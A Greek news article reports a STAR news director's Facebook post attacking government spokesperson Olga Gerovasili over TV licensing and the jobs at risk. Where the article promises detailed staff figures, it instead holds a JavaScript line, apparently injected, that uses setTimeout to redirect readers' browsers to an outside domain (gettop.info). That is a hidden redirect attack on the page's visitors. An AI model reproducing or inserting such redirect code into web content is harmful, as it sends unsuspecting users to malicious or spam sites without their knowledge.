Ο διευθυντής Ειδήσεων του STAR προς την Όλγα Γεροβασίλη: Το μαύρο στα κανάλια θα το ρίξει η κυβέρνηση

0
23

 

Μία σειρά από ερωτήματα υποβάλλει ο διευθυντής Ειδήσεων του STAR Κωστής Τσιακανίκας στην κυβερνητική εκπρόσωπο Όλγα Γεροβασίλη μέσα από τον λογαριασμό του στο facebook.

Όπως τονίζει στην ανάρτησή του: «Παρομοιάσατε τα κανάλια σαν αυθαίρετα σε δασική περιοχή! Είναι τουλάχιστον απογοητευτικό ! Και αυθαίρετα να είναι-που δεν είναι-θα τα γκρεμίσετε με 1400 ανθρώπους μέσα;» και σημειώνει: «Μιλήσατε για κροκοδείλια δάκρυα των εργοδοτών, θυμίζοντας τις ανθρωποθυσίες που έγιναν από τον δημοσιογραφικό κόσμο στα χρόνια της κρίσης, ταυτίζοντας τεχνηέντως και αυθαιρέτως τέτοιου είδους συμπεριφορές με το σύνολο του επιχειρηματικού κόσμου στα media ,τους διαμαρτυρόμενους εργαζόμενους και τη…ΝΔ! Γιατί? Μόνο το πολιτικό παιχνίδι σας ενδιαφέρει? Εμάς όχι! Γι αυτό και συμπαρασταθήκαμε στους συνάδελφους που δοκιμάζονταν χωρίς χρωματιστά γυαλιά και παρωπίδες!» και αναφέρει αναλυτικά τον αριθμό εργαζομένων σε κάθε τηλεοπτικό σταθμό αποδεικνύοντας με αριθμούς πόσοι άνθρωποι απειλούνται με ανεργία.

Επίσης, προσθέτει: «Γνωρίζω ότι το Star, λειτουργούσε ,λειτουργεί και θα λειτουργεί σεβόμενο κανόνες. Οι εργαζόμενοι γνωρίζουν, 23 χρόνια τώρα, ότι βρίσκονται σε μια επιχείρηση που τιμά τους εργαζόμενους της και δεν σταμάτησε να το κάνει ,ούτε όταν η κρίση μείωσε τα έσοδα του. Και αυτό διότι η διοίκηση του, λειτουργούσε πάντα και θα συνεχίσει να λειτουργεί στα πλαίσια της επιχειρηματικής λογικής! Με μεγάλες επενδύσεις στην τεχνολογία, στο ανθρώπινο δυναμικό και την εξειδίκευση του, στο ποιοτικό πρόγραμμα και την πλουραλιστική ενημέρωση ,το Star στόχευε πάντα σε μερίδιο αγοράς που του επέτρεπε να ελπίζει στο αύριο, με τους μετόχους στο πλευρό του».

Αναλυτικά:

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here